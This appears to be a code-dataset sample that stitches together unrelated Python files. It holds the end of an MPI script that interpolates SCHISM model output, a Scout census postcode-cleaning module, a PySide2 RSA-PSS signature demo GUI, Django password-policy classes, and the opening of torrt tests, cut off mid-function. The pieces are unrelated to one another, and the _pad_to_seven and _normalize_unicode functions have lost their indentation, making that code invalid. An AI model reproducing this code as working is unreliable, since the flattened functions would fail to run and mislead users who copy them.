        #compute (x,y,z) for each variable
        Sii=zdata()
        for mm, svar in enumerate(svars):
            exec('Sii.{}=[]'.format(svar))
            ndim=C.variables[svar].ndim; dim=C.variables[svar].shape; dimname=C.variables[svar].dimensions
            data=[]
            for i in arange(nt):
                k1=k1s[i]; k2=k2s[i]; rat=rats[i]
                #get variable values (node-based or element-based)
                if ('nSCHISM_hgrid_node' in dimname):
                    trii=array(C.variables[svar][i][sbp.ip])
                elif ('nSCHISM_hgrid_face' in dimname):
                    trii=array(C.variables[svar][i][sbp.ie])
                else:
                    sys.exit('unknown variable format: {},{}'.format(svar,dim))
                #extend values in the bottom: dim[2] is nvrt (fill dry layers
                #below kbp with the bottom value so interpolation stays valid)
                if ('nSCHISM_vgrid_layers' in dimname):
                    sindp=arange(sbp.nsta)
                    if ('nSCHISM_hgrid_node' in dimname):
                        for nn in arange(3):
                            kbp=sbp.kbp[:,nn]; btri=trii[sindp,nn,kbp]
                            for k in arange(vd.nvrt):
                                fp=k<kbp
                                trii[sindp[fp],nn,k]=btri[fp]
                    elif ('nSCHISM_hgrid_face' in dimname):
                        kbe=sbp.kbp.max(axis=1); btri=trii[sindp,kbe]
                        for k in arange(vd.nvrt):
                            fp=k<kbe
                            trii[sindp[fp],k]=btri[fp]
                    else:
                        sys.exit('unknown variable format: {},{}'.format(svar,dim))
                #horizontal interp (weight by the 3 area coordinates)
                if ('nSCHISM_hgrid_node' in dimname):
                    if ndim==2: tri=(trii*sbp.acor).sum(axis=1)
                    if ndim==3: tri=(trii*sbp.acor[...,None]).sum(axis=1)
                    if ndim==4: tri=(trii*sbp.acor[...,None,None]).sum(axis=1); rat=rat[:,None]
                else:
                    tri=trii
                #vertical interp (linear between layers k1 and k2)
                if ('nSCHISM_vgrid_layers' in dimname):
                    datai=(tri[sindp,k1]*(1-rat)+tri[sindp,k2]*rat)
                else:
                    datai=tri
                data.append(datai)
            #save result from each variable (move station axis to the front)
            exec('ds=[1,0,*arange(2,{}-1)]; Sii.{}.extend(array(data).transpose(ds))'.format(ndim,svar))
        #save result from subdomain
        for i in svars: exec('Si.{}.extend(Sii.{})'.format(i,i))
    #combine istack results (restore the original station order via sinds)
    for i in svars: exec('ds=[1,0,*arange(2,array(Si.{}).ndim)]; S.{}.extend(array(Si.{})[sinds].transpose(ds))'.format(i,i,i))
    dt00=time.time()-t00; print('finish reading stack={}; time={:0.2f}s, myrank={}'.format(istack,dt00,myrank)); sys.stdout.flush()
S.time=array(S.time); ['S.{}=array(S.{}).astype("float32")'.format(i,i) for i in svars]
#-----------------------------------------------------------------------------
#combine results from all ranks
#-----------------------------------------------------------------------------
#igather=1: each worker writes its partial result to disk; rank 0 reloads them
if igather==1 and myrank<nproc: savez('{}_{}'.format(sname,myrank),S)
comm.Barrier()
if igather==0: sdata=comm.gather(S,root=0)
if igather==1 and myrank==0: sdata=[loadz('{}_{}.npz'.format(sname,i)) for i in arange(nproc)]
if myrank==0:
    #rebuild the capsule under the *renamed* variable names (rvars)
    S=zdata(); S.time=[]; S.bp=bp
    for i in rvars: exec('S.{}=[]'.format(i))
    for i in arange(nproc):
        Si=sdata[i]; S.time.extend(Si.time)
        for m,[svar,rvar] in enumerate(zip(svars,rvars)): exec('S.{}.extend(Si.{})'.format(rvar,svar))
    #save data (sort all records chronologically first)
    S.time=array(S.time); sind=argsort(S.time); S.time=S.time[sind]
    for i in rvars: exec('ds=[1,0,*arange(2,array(S.{}).ndim)]; S.{}=array(S.{})[sind].transpose(ds)'.format(i,i,i))
    if fmt==0:
        savez('{}'.format(sname),S)
    else:
        #write out ASCII file (one row per time: time then all station values)
        for i in rvars: exec('ds=[1,*arange(2,array(S.{}).ndim),0]; S.{}=array(S.{}).transpose(ds)'.format(i,i,i))
        fid=open('{}.dat'.format(sname),'w+')
        for i,ti in enumerate(S.time):
            datai=[]
            for rvar in rvars: exec('datai.extend(S.{}[{}].ravel())'.format(rvar,i))
            fid.write(('{:12.6f}'+' {:10.6f}'*len(datai)+'\n').format(ti,*datai))
        fid.close()
    if igather==1: [os.remove('{}_{}.npz'.format(sname,i)) for i in arange(nproc)] #clean
#-----------------------------------------------------------------------------
#finish MPI jobs
#-----------------------------------------------------------------------------
comm.Barrier()
if myrank==0: dt=time.time()-t0; print('total time used: {} s'.format(dt)); sys.stdout.flush()
sys.exit(0) if qnode in ['bora'] else os._exit(0)
|
<reponame>the-scouts/incognita
"""Merges ONS postcode data with census data
Outputs a file which is contains the original census data, a postcode validity
check, and the merged data.
The output fields are those in the census and ONS data, and the additional
fields 'postcode_is_valid' and 'clean_postcode'.
"""
import re
import pandas as pd
from incognita.data import scout_census
from incognita.logger import logger
CLEAN_POSTCODE_LABEL = "clean_postcode"
def merge_with_postcode_directory(census_data: pd.DataFrame, ons_pd_data: pd.DataFrame, ons_fields_data_types: dict[str, list[str]]) -> pd.DataFrame:
    """Clean postcodes, repair invalid ones, merge ONS data, fill defaults.

    Args:
        census_data: census table with a raw postcode column.
        ons_pd_data: ONS postcode directory indexed by clean postcode.
        ons_fields_data_types: ONS field names grouped by data type.

    Returns:
        The census table with ONS columns merged in and unmerged rows
        filled with default values.
    """
    logger.info("Cleaning the postcodes")
    _clean_and_verify_postcode(census_data)

    # attempt to fix invalid postcodes
    logger.info("Adding ONS postcode directory data to Census and outputting")
    fixed = _try_fix_invalid_postcodes(census_data, ons_pd_data.index)

    # fully merge the data
    logger.info("Merging data")
    merged = pd.merge(fixed, ons_pd_data, how="left", left_on="clean_postcode", right_index=True, sort=False)

    # fill unmerged rows with default values
    logger.info("filling unmerged rows")
    return _fill_unmerged_rows(merged, ons_fields_data_types)
def _clean_and_verify_postcode(census_data: pd.DataFrame) -> None:
    """Cleans postcode data and inserts clean postcodes and validity check

    Inserts a cleaned-postcode column and an (initially NaN) validity
    column immediately to the right of the raw postcode column.

    Args:
        census_data: table of data with a postcode column
    """
    # Insertion is from the left, so the new columns must be added in
    # ascending positional order or the layout won't make sense.
    postcode_column = scout_census.column_labels.POSTCODE  # heading of the postcode column in the table
    postcode_position = census_data.columns.get_loc(postcode_column)
    valid_postcode_label = scout_census.column_labels.VALID_POSTCODE

    logger.info("Cleaning postcodes")
    cleaned_postcodes = _postcode_cleaner(census_data[postcode_column])

    logger.info("Inserting columns")
    census_data.insert(postcode_position + 1, CLEAN_POSTCODE_LABEL, cleaned_postcodes)
    census_data.insert(postcode_position + 2, valid_postcode_label, float("NaN"))
def _postcode_cleaner(postcode: pd.Series) -> pd.Series:
    """Cleans postcode to ONS postcode directory format.

    Args:
        postcode: pandas series of postcodes

    Returns:
        Cleaned postcode
    """
    # Regular expression to remove whitespace, non-alphanumeric (keep shifted numbers)
    regex_clean = re.compile(r'[\s+]|[^a-zA-Z\d!"£$%^&*()]')

    # Remove any whitespace and most non-alphanumeric chars
    # Convert input to uppercase (ONS Postcode Directory uses upper case)
    # Pads length as we use the 7 long version from the Postcode Directory
    # Bug fix: pass regex=True explicitly — pandas >= 2.0 defaults
    # Series.str.replace to literal matching and rejects compiled patterns
    # without it.
    postcode = postcode.str.replace(regex_clean, "", regex=True).str.upper().apply(_pad_to_seven)

    # Replaces shifted numbers with their number equivalents
    postcode = (
        postcode.str.replace("!", "1", regex=False)
        .str.replace('"', "2", regex=False)
        .str.replace("£", "3", regex=False)
        .str.replace("$", "4", regex=False)
        .str.replace("%", "5", regex=False)
        .str.replace("^", "6", regex=False)
        .str.replace("&", "7", regex=False)
        .str.replace("*", "8", regex=False)
        .str.replace("(", "9", regex=False)
        .str.replace(")", "0", regex=False)
    )

    # TODO: add macOS shift -> numbers conversion
    return postcode
def _pad_to_seven(single_postcode): # r'(.*?(?=.{3}$))(.{3}$)' (potential regex)
"""Pad postcode strings
If length of postcode is 6 or 5 then insert 1 or 2 spaces.
6 first as more common to speed up execution
"""
if single_postcode == single_postcode: # filters out NaNs
length = len(single_postcode)
if length == 6 or length == 5:
single_postcode = single_postcode[:-3] + " " * (7 - length) + single_postcode[-3:]
return single_postcode
def _try_fix_invalid_postcodes(census_data: pd.DataFrame, all_valid_postcodes: pd.Index) -> pd.DataFrame:
    """Uses various methods attempting to provide every record with a valid postcode

    Currently only implemented for sections with youth membership.
    TODO: implement for all entity types

    Methodology:
    - If section has an invalid postcode in 2017 or 2018, use 2019's if valid (all are valid or missing in 2019)
    - If section has no valid postcodes, use most common (mode) postcode from sections in group in that year, then try successive years
    - If group or district has no valid postcode in 2010-2016, use following years (e.g. if 2010 not valid, try 2011, 12, 13 etc.)

    Args:
        census_data: Dataframe of census data including invalid postcodes
        all_valid_postcodes: All valid postcodes from the ONS Postcode Directory

    Returns:
        modified data table with more correct postcodes
    """
    logger.info("filling postcodes in sections with invalid postcodes")

    # Helper variables to store field headings for often used fields
    section_id_label = scout_census.column_labels.id.COMPASS
    group_id_label = scout_census.column_labels.id.GROUP
    district_id_label = scout_census.column_labels.id.DISTRICT

    # Lists of entity types to match against in constructing section records tables
    group_section_types = scout_census.TYPES_GROUP
    district_section_types = scout_census.TYPES_DISTRICT
    section_types = group_section_types | district_section_types
    pre_2017_types = {"Group", "District"}

    # Columns to use in constructing the MultiIndex. Larger groups go first towards smaller
    index_cols = [district_id_label, group_id_label, section_id_label, scout_census.column_labels.CENSUS_ID]

    # Find which postcodes are valid
    census_data[scout_census.column_labels.VALID_POSTCODE] = census_data[CLEAN_POSTCODE_LABEL].isin(all_valid_postcodes)

    # Sets a MultiIndex on the data table to enable fast searching and querying for data
    census_data = census_data.set_index(index_cols, drop=False)

    # Fix steps run from the most specific scope (same section) outwards
    # (same group, same district), finishing with pre-2017 entity records.
    census_data = _run_postcode_fix_step(census_data, all_valid_postcodes, "section", "latest Census", section_types, section_id_label, 2)
    census_data = _run_postcode_fix_step(census_data, all_valid_postcodes, "group-section", "same group", group_section_types, group_id_label, 1)
    census_data = _run_postcode_fix_step(census_data, all_valid_postcodes, "district-section", "same district", district_section_types, district_id_label, 0)
    census_data = _run_postcode_fix_step(census_data, all_valid_postcodes, "pre 2017", "same entity", pre_2017_types, section_id_label, 2)

    # Undo the changes made in this method by removing the MultiIndex and
    # removing the merge test column
    census_data = census_data.reset_index(drop=True)
    return census_data
def _fill_unmerged_rows(census_data: pd.DataFrame, fields_data_types: dict) -> pd.DataFrame:
    """Fills rows that have not merged with default values

    Fills all passed fields in rows where there has been no data merged:
    categorical fields get scout_census.DEFAULT_VALUE and numeric fields
    get 0.

    Args:
        census_data: DataFrame with census data
        fields_data_types: dict of data types containing lists of fields

    Returns:
        dataframe with filled values
    """
    # The valid-postcode flag doubles as the merge-success indicator.
    row_has_merged = scout_census.column_labels.VALID_POSTCODE
    unmerged = ~census_data[row_has_merged]

    for field in fields_data_types["categorical"]:
        # The default value must exist as a category before assignment.
        if scout_census.DEFAULT_VALUE not in census_data[field].cat.categories:
            census_data[field] = census_data[field].cat.add_categories([scout_census.DEFAULT_VALUE])
        census_data.loc[unmerged, field] = scout_census.DEFAULT_VALUE

    for field in fields_data_types["numeric"]:
        census_data.loc[unmerged, field] = 0

    return census_data
def _run_postcode_fix_step(
    data: pd.DataFrame, all_valid_postcodes: pd.Index, invalid_type: str, fill_from: str, entity_types: set[str], column_label: str, index_level: int
) -> pd.DataFrame:
    """Runs postcode fixer for given data and parameters.

    Method:
    Gets all records with ID from given column and index level, then clears the indexing
    Returns the first row's postcode. As the index is sorted, this will return the earliest correct year.

    TODO change to use modal result instead of first (If section has no valid postcodes, use most common
    (modal) postcode from sections in group in that year, then try successive years)

    Args:
        data: Census data
        all_valid_postcodes: Index of all valid postcodes in the ONS postcode directory
        invalid_type: Which type of issue are we fixing (for log message)
        fill_from: Where are we pulling valid postcodes from (for log message)
        entity_types: Entity types to filter the fixing on (e.g. Colony, Group, Network, District)
        column_label: Name of the index level being used
        index_level: Level of the MultiIndex to filter on

    Returns:
        Updated census data
    """
    # Index level: 0=District; 1=Group; 2=Section; 3=Census_ID
    logger.info(f"Fill invalid {invalid_type} postcodes with valid section postcodes from {fill_from}")
    entity_type_label = scout_census.column_labels.UNIT_TYPE
    valid_postcode_label = scout_census.column_labels.VALID_POSTCODE

    # Gets all entity records matching the given criteria, and returns a
    # minimal set of fields for memory optimisation
    records = data.loc[data[entity_type_label].isin(entity_types), [valid_postcode_label, column_label, CLEAN_POSTCODE_LABEL]]
    # Snapshot the valid count so the improvement can be logged at the end.
    valid_postcodes_start = data[valid_postcode_label].to_numpy().sum()

    # Get all valid clean postcodes from the filtered records. Then sort the
    # index with census IDs high -> low. Then group the data by the passed
    # index level. As the census IDs are sorted descending, the first item will
    # be the newest possible clean postcode, indexed by the passed level.
    firsts = records.loc[records[valid_postcode_label], CLEAN_POSTCODE_LABEL].sort_index(ascending=(True, True, True, False)).groupby(level=index_level).first()

    # Map invalid postcodes to valid postcodes by the given ID type/field
    clean_postcodes = records.loc[~records[valid_postcode_label], column_label].map(firsts)

    # Merge in the changed postcodes and overwrite pre-existing postcodes in the Clean Postcode column
    clean_postcodes_not_na = clean_postcodes.loc[clean_postcodes.notna()]  # .update(*) uses not_na filter
    data.loc[clean_postcodes_not_na.index, CLEAN_POSTCODE_LABEL] = clean_postcodes_not_na

    # Update valid postcode status
    data[valid_postcode_label] = data[CLEAN_POSTCODE_LABEL].isin(all_valid_postcodes)
    logger.info(f"change in valid postcodes is: {data[valid_postcode_label].to_numpy().sum() - valid_postcodes_start}")

    return data
|
<filename>guiMenu.py
import sys
from PySide2 import QtWidgets, QtCore
from gui import GuiDigitalSignature
from pki import Pki
from RsaPssSignature import RsaPssSignature
class GuiMenu:
    """Glue between the digital-signature GUI and the RSA-PSS / PKI back end.

    NOTE(review): all widget access in the methods below goes through the
    module-level global `window` (created in the __main__ block), not the
    `window` argument passed to __init__, which is used only for signal
    wiring. The class therefore only works when instantiated from this
    module's entry point — confirm before reusing elsewhere.
    """
    def __init__(self, window):
        self.pki = Pki()
        self.rsa = RsaPssSignature()          # sender-side signing state
        self.rsaReceiver = RsaPssSignature()  # receiver-side verification state
        self.email = ""                       # last email seen, for change detection
        self.emailChanged = False
        self.hashedMessage = ""               # last hash seen, for change detection
        self.hashChanged = False
        self.sendButtonCount = 0              # guards one-time signal connection
        # To make function called in sequences
        window.guiSignal.emailReady.connect(self.emailReadyCall)
        window.guiSignal.messageOnKeyPress.connect(self.messageOnKeyPressCall)
        window.guiSignal.sendOnClicked.connect(self.sendOnClickedCall)

    @QtCore.Slot(str)
    def emailReadyCall(self, email):
        """Refresh the key display and regenerate the signature for `email`."""
        self.DisplayKeys(email)
        self.GenerateSignature()

    @QtCore.Slot(str)
    def messageOnKeyPressCall(self, message):
        """Re-hash and re-sign as the user types the message."""
        self.GenerateHash(message)
        self.GenerateSignature()

    @QtCore.Slot()
    def sendOnClickedCall(self):
        """Simulate sending: show the signed document and verify it receiver-side."""
        self.ReceiveSignatureDocument()
        self.GetSenderPublicKey()
        self.signedDocumentChangedCall(window.signedDocument.toPlainText())
        # Call after sendOnClicked finished
        # Connect only once, on the first click, to avoid duplicate slot calls.
        if self.sendButtonCount == 0:
            window.guiSignal.signedDocumentChanged.connect(self.signedDocumentChangedCall)
        self.sendButtonCount += 1

    @QtCore.Slot(str)
    def signedDocumentChangedCall(self, signedDoc):
        """Parse and verify the signed document step by step; stop at first failure."""
        if self.ShowMessageSignature(signedDoc):
            if self.GenerateReceiveHash(signedDoc):
                if self.ShowReceiveSignature(signedDoc):
                    self.VerifySignatureReceived()

    def DisplayKeys(self, email):
        """Fetch (or create) the key pair for `email` and show it in the GUI."""
        # To check whether user changed the email
        # Used to prevent system from regenerate the signature when user click Send
        # It is because emailReady Signal will be triggered everytime the Send button is clicked
        if self.email != email:
            self.email = email
            self.emailChanged = True
        else:
            self.emailChanged = False
            return
        # To check whether the email entered is a new email
        newEmail = False
        if not self.pki.CheckEntryExists(email):
            newEmail = True
        # Get the keys from PKI
        publicKey, self.privateKey = self.pki.CheckPair(email)
        # convert to string type
        publicKeyPEM = self.rsa.GetKeyInPEM(publicKey)
        privateKeyPEM = self.rsa.GetKeyInPEM(self.privateKey)
        # Set Text on the TextEdit fields
        window.privateKey.setText(privateKeyPEM)
        window.publicKey.setText(publicKeyPEM)
        # if it is a new email, add an entry on PKI content area
        if newEmail:
            window.AddPkiEntry(email, publicKeyPEM)

    def GenerateHash(self, message):
        """Hash `message` (if the back end accepts it) and display the digest."""
        if self.rsa.SetMessage(message):
            # Hash the message
            self.rsa.HashMessage()
            # Set the plaintext hash on the edit field
            hashedMessage = self.rsa.GetHashedMessage()
            window.hash.setText(hashedMessage)

    # Generate signature based on hash
    def GenerateSignature(self):
        """Sign the current hash when either the email or the hash changed."""
        # check if message hash exists, if yes, then proceed, else return
        # use to generate a new signature after user change the email
        try:
            hashedMessage = self.rsa.GetHashedMessage()
        except AttributeError:
            return
        # To check whether user have changed the message
        # Generate the signature when the message is changed
        if self.hashedMessage != hashedMessage:
            self.hashedMessage = hashedMessage
            self.hashChanged = True
        else:
            self.hashChanged = False
        # Used to prevent system from regenerate the signature when user click Send
        # It is because emailReady Signal will be triggered everytime the Send button is clicked
        # If hashChanged check is not exists, signature will not be regenerate as emailChanged is evaluate as False
        # Here it generate the signature when hash is changed
        if (self.emailChanged is False) and (self.hashChanged is False):
            return
        # sign the hash using private key
        self.rsa.SignSignature(key = self.privateKey)
        # set the plaintext signature on edit field
        window.signature.setText(self.rsa.GetSignature())

    def ReceiveSignatureDocument(self):
        """Copy the freshly signed document into the receiver pane."""
        window.signedDocument.setText(self.rsa.GetSignedDocument())

    def GetSenderPublicKey(self):
        """Look up the sender's public key in the PKI and display it."""
        self.senderPublicKey = self.pki.GetPublicKey(self.email)
        senderPublicKeyPEM = self.rsaReceiver.GetKeyInPEM(self.senderPublicKey)
        window.senderPublic.setText(senderPublicKeyPEM)

    def ShowMessageSignature(self, signedDoc):
        """Show the message part of the document; return False on bad format."""
        # trim the message out from the signature document
        message = self.rsaReceiver.GetMessageFromSignedDoc(signedDoc)
        # check the format of the signature
        if message:
            window.signedDocument.setStyleSheet('background-color: white; ')
            window.receiverMessage.setText(message)
            self.rsaReceiver.SetMessage(message)
            return True
        else:
            # Malformed document: highlight the field and clear downstream widgets.
            window.signedDocument.setStyleSheet('background-color: #ffcdd2; ')
            window.signedDocument.setFocus()
            window.receiverMessage.setText("")
            window.receiveSignature.setText("")
            window.generatedHash.setText("")
            window.indicator.setText("")
            window.indicator.setStyleSheet('background-color: white; ')
            window.Alert("Incorrect Signature Document Format")
            return False

    def GenerateReceiveHash(self, signedDoc):
        """Re-hash the received message with the document's declared algorithm."""
        # Get the hashAlgo from "Hash: " section of the signed document
        hashAlgo = self.rsaReceiver.GetHashAlgoFromSignedDoc(signedDoc)
        # Check whether it is the supported hash function
        if self.rsaReceiver.SetHashAlgo(hashAlgo):
            window.signedDocument.setStyleSheet('background-color: white; ')
            # Generate the hash value using the hashing function given
            self.rsaReceiver.HashMessage()
            # Set the plaintext hash on the edit field
            hashedMessage = self.rsaReceiver.GetHashedMessage()
            window.generatedHash.setText(hashedMessage)
            return True
        else:
            window.signedDocument.setStyleSheet('background-color: #ffcdd2; ')
            window.generatedHash.setText("")
            window.indicator.setText("")
            window.indicator.setStyleSheet('background-color: white; ')
            window.Alert("Supported Hashing Function: \nSHA256, SHA384, SHA512, SHA1, MD5")
            return False

    @QtCore.Slot(str)
    def ShowReceiveSignature(self, signedDoc):
        """Extract and display the signature block; flag format errors."""
        signature = self.rsaReceiver.GetSignatureFromSignedDoc(signedDoc)
        if signature:
            window.signedDocument.setStyleSheet('background-color: white; ')
            window.receiveSignature.setText(signature)
            return True
        else:
            window.signedDocument.setStyleSheet('background-color: #ffcdd2; ')
            window.signedDocument.setFocus()
            window.receiveSignature.setText("")
            window.indicator.setText("")
            window.indicator.setStyleSheet('background-color: white; ')
            window.Alert("Incorrect Signature Document Format")
            return False

    @QtCore.Slot()
    def VerifySignatureReceived(self):
        """Verify the displayed signature against the sender's public key."""
        receiveSignature = window.receiveSignature.toPlainText()
        try:
            signatureByte = self.rsaReceiver.GetSignatureFromString(receiveSignature)
        # NOTE(review): inline __import__ avoids a top-level import of binascii;
        # a plain `import binascii` at the top of the file would be cleaner.
        except __import__('binascii').Error as err:
            signatureByte = False
        if signatureByte:
            signatureVerified = self.rsaReceiver.VerifySignature(signature = signatureByte, key = self.senderPublicKey)
        else:
            signatureVerified = False
        if signatureVerified:
            window.indicator.setStyleSheet('background-color: #a5d6a7; ')
            window.indicator.setText("Signature Verified")
            return True
        else:
            window.indicator.setStyleSheet('background-color: #ffcdd2; ')
            window.indicator.setText("Invalid Signature")
            return False
if __name__ == "__main__":
    app = QtWidgets.QApplication([])
    # NOTE: `window` must remain module-global — GuiMenu methods reference it
    # directly rather than through the constructor argument.
    window = GuiDigitalSignature()
    window.showMaximized()
    menu = GuiMenu(window)
    sys.exit(app.exec_())
"""Handle password rules."""
import re
import unicodedata
from django.contrib.auth.hashers import check_password
from django.core.exceptions import ValidationError
from django.utils.translation import gettext_lazy as _
from cpovc_access import BasePolicy
from cpovc_access.models import PasswordChange
def _normalize_unicode(value):
try:
value = unicodedata.normalize('NFKD', str(value))
return value.encode('ascii', 'ignore').strip().lower()
except UnicodeDecodeError:
return value
class PasswordStrengthPolicy(BasePolicy):
    """Password strength policy classes must implement.

    `validate` a method which accept a password and the related user and raises
    a validation error when the password doesn't validate the policy.
    Optionally:
    `policy_text` a property which returns a short text to be displayed in
    password policy explanations
    `policy_caption` a property which returns a short caption to be displayed
    with the password policy.
    """

    # Whether this policy should be shown in policy listings.
    show_policy = True

    def validate(self, value, user=None):
        """Validate `value` for `user`; subclasses must override.

        Bug fix: the original used ``raise NotImplemented()`` — the
        `NotImplemented` singleton is not callable, so this raised a
        confusing TypeError instead of signalling an abstract method.
        """
        raise NotImplementedError()

    @property
    def policy_text(self):
        """Short policy description, or None when there is nothing to show."""
        return None

    @property
    def policy_caption(self):
        """Short caption for the policy, or None."""
        return None
class PasswordMinLength(PasswordStrengthPolicy):
    """Require passwords to contain a minimum number of characters."""

    # Minimum acceptable length; set to None to disable the check entirely.
    min_length = 8
    text = _('Passwords must be at least {min_length} characters in length.')

    def validate(self, value, user=None):
        """Raise ValidationError when `value` is shorter than `min_length`."""
        if self.min_length is None:
            return
        if len(value) >= self.min_length:
            return
        raise ValidationError(
            self.text.format(min_length=self.min_length),
            code='password_min_length')

    @property
    def policy_text(self):
        """Human-readable description of this policy."""
        return self.text.format(min_length=self.min_length)
class PasswordContains(PasswordStrengthPolicy):
    """Base class which validates if passwords contain at least a certain.

    number of characters from a certain set.
    """

    chars = None        # character set the password must draw from
    min_count = 1       # minimum number of *distinct* matching characters
    text = None         # singular message
    plural_text = None  # plural message, formatted with {min_count}

    def validate(self, value, user=None):
        """Raise ValidationError unless `value` contains at least `min_count`
        distinct characters from `chars` (occurrences are not counted)."""
        matched = set(value) & set(self.chars)
        if len(matched) < self.min_count:
            raise ValidationError(self.text, 'password_complexity')

    @property
    def policy_text(self):
        """Singular or plural policy description depending on `min_count`."""
        template = self.plural_text if self.min_count > 1 else self.text
        return template.format(min_count=self.min_count)

    @property
    def policy_caption(self):
        """The character set itself serves as the caption."""
        return self.chars
class PasswordContainsUpperCase(PasswordContains):
    """Require at least `min_count` distinct uppercase ASCII letters."""
    chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
    text = _('Passwords must have at least one uppercase character.')
    plural_text = _('Passwords must have at least {min_count} '
                    'uppercase characters.')
class PasswordContainsLowerCase(PasswordContains):
    """Require at least `min_count` distinct lowercase ASCII letters."""
    chars = 'abcdefghijklmnopqrstuvwxyz'
    # Fixed typo in the user-facing message: "lowecase" -> "lowercase".
    text = _('Passwords must have at least one lowercase character.')
    plural_text = _('Passwords must have at least {min_count} '
                    'lowercase characters.')
class PasswordContainsNumbers(PasswordContains):
    """Require at least `min_count` distinct digit characters."""
    chars = '0123456789'
    text = _('Passwords must have at least one number.')
    plural_text = _('Passwords must have at least {min_count} '
                    'numbers.')
class PasswordContainsSymbols(PasswordContains):
    """Require at least `min_count` distinct punctuation/symbol characters.

    Note: the set includes a trailing space character.
    """
    chars = '!@#$%^&*()_+-={}[]:;"\'|\\,.<>?/~` '
    text = _('Passwords must have at least one special character.')
    plural_text = _('Passwords must have at least {min_count} special '
                    'characters (punctuation).')
class PasswordContainsAlphabetics(PasswordContains):
    """Require at least `min_count` distinct ASCII letters (either case)."""
    chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
    text = _('Passwords must have at least one alphabetic character.')
    plural_text = _('Passwords must have at least {min_count} '
                    'alphabetic characters.')
class PasswordUserAttrs(PasswordStrengthPolicy):
    """Validate if password doesn't contain values from a list of user.

    attributes. Every attribute will be normalized into ascii and split
    on non alphanumerics.
    Use this in the clean method of password forms
    `value`: password
    `user`: user object with attributes
    Example, which would raise a ValidationError:
    user.first_name = 'John'
    password_user_attrs('<PASSWORD>', user)
    """

    # Attributes of `user` that must not appear (in pieces) in the password.
    user_attrs = ('email', 'first_name', 'last_name', 'username')
    text = _('Passwords are not allowed to contain (pieces of) your name '
             'or email.')
    # Splits normalized (lowercase ASCII) values into alphanumeric pieces.
    _non_alphanum = re.compile(r'[^a-z0-9]')

    def validate(self, value, user=None):
        """Raise ValidationError when `value` contains any >=4-char piece of a
        user attribute."""
        if user is None:
            return
        simple_pass = _normalize_unicode(value)
        for attr in self.user_attrs:
            v = getattr(user, attr, None)
            # Bug fix: the original tested `attr` (the attribute *name*,
            # e.g. 'email' — a constant) instead of `v` (the attribute
            # *value*), so missing/None/short values were never skipped and
            # the guard was effectively dead.
            if not v or len(v) < 4:
                continue
            v = _normalize_unicode(v)
            for piece in self._non_alphanum.split(v):
                # Ignore short fragments to avoid trivial false positives.
                if len(piece) < 4:
                    continue
                if piece in simple_pass:
                    raise ValidationError(self.text, 'password_user_attrs')

    @property
    def policy_text(self):
        """Human-readable description of this policy."""
        return self.text
class PasswordDisallowedTerms(PasswordStrengthPolicy):
    """Disallow a (short) list of terms in passwords.

    Ideal for too obvious terms like the name of the site or company.
    """

    terms = None
    text = _('Passwords are not allowed to contain the following term(s): '
             '{terms}.')
    show_policy = False

    def __init__(self, **kwargs):
        """Normalize the configured terms once, at construction time."""
        self.terms = [_normalize_unicode(term) for term in kwargs.pop('terms')]
        super(PasswordDisallowedTerms, self).__init__(**kwargs)

    def validate(self, value, user=None):
        """Raise ValidationError listing every disallowed term found in `value`."""
        simple_pass = _normalize_unicode(value)
        found = [term for term in self.terms if term in simple_pass]
        if found:
            raise ValidationError(
                self.text.format(terms=u', '.join(found)),
                'password_disallowed_terms')

    @property
    def policy_text(self):
        """Policy description including the full list of disallowed terms."""
        return self.text.format(terms=u', '.join(self.terms))
class PasswordLimitReuse(PasswordStrengthPolicy):
    """Limits reuse of previous passwords.

    Use this to prevent users from reusing one of their previous passwords.
    """
    # Number of most recent successful password changes to compare against.
    max_pw_history = 3
    text = _('New password must be different than your last password.')
    plural_text = _('New password must not be one of your last '
                    '{max_pw_history} passwords.')

    def validate(self, value, user=None):
        """Raise ValidationError if `value` matches a recent password of `user`."""
        if user is None:
            return
        # Newest changes first; the slice limits the check to the configured depth.
        last_pw_changes = PasswordChange.objects.filter(
            user=user, successful=True).order_by('-id')[:self.max_pw_history]
        for pw_change in last_pw_changes:
            if check_password(value, pw_change.password):
                raise ValidationError(self.policy_text, 'password_limit_reuse')

    @property
    def policy_text(self):
        """Singular or plural description depending on `max_pw_history`."""
        if self.max_pw_history > 1:
            return self.plural_text.format(max_pw_history=self.max_pw_history)
        else:
            return self.text.format(max_pw_history=self.max_pw_history)
|
<gh_stars>10-100
from os.path import dirname, realpath, join
from torrentool.torrent import Torrent
from torrt.base_rpc import BaseRPC
from torrt.base_tracker import GenericPublicTracker
from torrt.toolbox import bootstrap, TrackerClassesRegistry, NotifierClassesRegistry, RPCClassesRegistry, \
configure_rpc, configure_tracker, add_torrent_from_url, get_registered_torrents, walk, remove_torrent, toggle_rpc
from torrt.utils import RPCObjectsRegistry, TorrentData
CURRENT_DIR = dirname(realpath(__file__))
def test_basic():
    """Sanity-check that every class registry is populated after import."""
    registries = (TrackerClassesRegistry, NotifierClassesRegistry, RPCClassesRegistry)
    for registry in registries:
        assert registry.get()
class DummyTracker(GenericPublicTracker):
    """Minimal public tracker stub: the page URL doubles as the download link."""
    alias = 'dummy.local'
    mirrors = ['dummy-a.local']

    def get_download_link(self, url):
        """Return `url` unchanged — no scraping needed for the dummy tracker."""
        return url
# Register the dummy tracker so tests can configure 'dummy.local'.
TrackerClassesRegistry.add(DummyTracker)
class DummyRPC(BaseRPC):
    """In-memory RPC stub that stores parsed torrents keyed by info hash."""
    alias = 'dummy'

    def __init__(self, enabled=False):
        self.enabled = enabled
        self.torrents = {}  # info_hash -> parsed Torrent
        super().__init__()

    def method_add_torrent(self, torrent: TorrentData, download_to: str = None, params: dict = None):
        """Parse the raw torrent payload and register it under its info hash."""
        parsed = Torrent.from_string(torrent.raw)
        self.torrents[parsed.info_hash] = parsed

    def method_remove_torrent(self, hash_str, with_data=False):
        """Drop the torrent; raises KeyError for unknown hashes."""
        self.torrents.pop(hash_str)

    def method_get_torrents(self, hashes=None):
        """Return summary dicts for the stored torrents matching `hashes`."""
        results = []
        for hash_str, parsed in self.torrents.items():
            if hash_str not in hashes:
                continue
            results.append({
                'id': parsed.info_hash,
                'name': parsed.name,
                'hash': parsed.info_hash,
                'download_to': None,
                # Points at a DummyTracker mirror so walk() re-checks this torrent.
                'comment': 'http://dummy-a.local/id/one',
            })
        return results

    def method_get_version(self):
        """Static version string for the stub."""
        return '0.0.1'
def test_fullcycle(monkeypatch, datafix_dir):
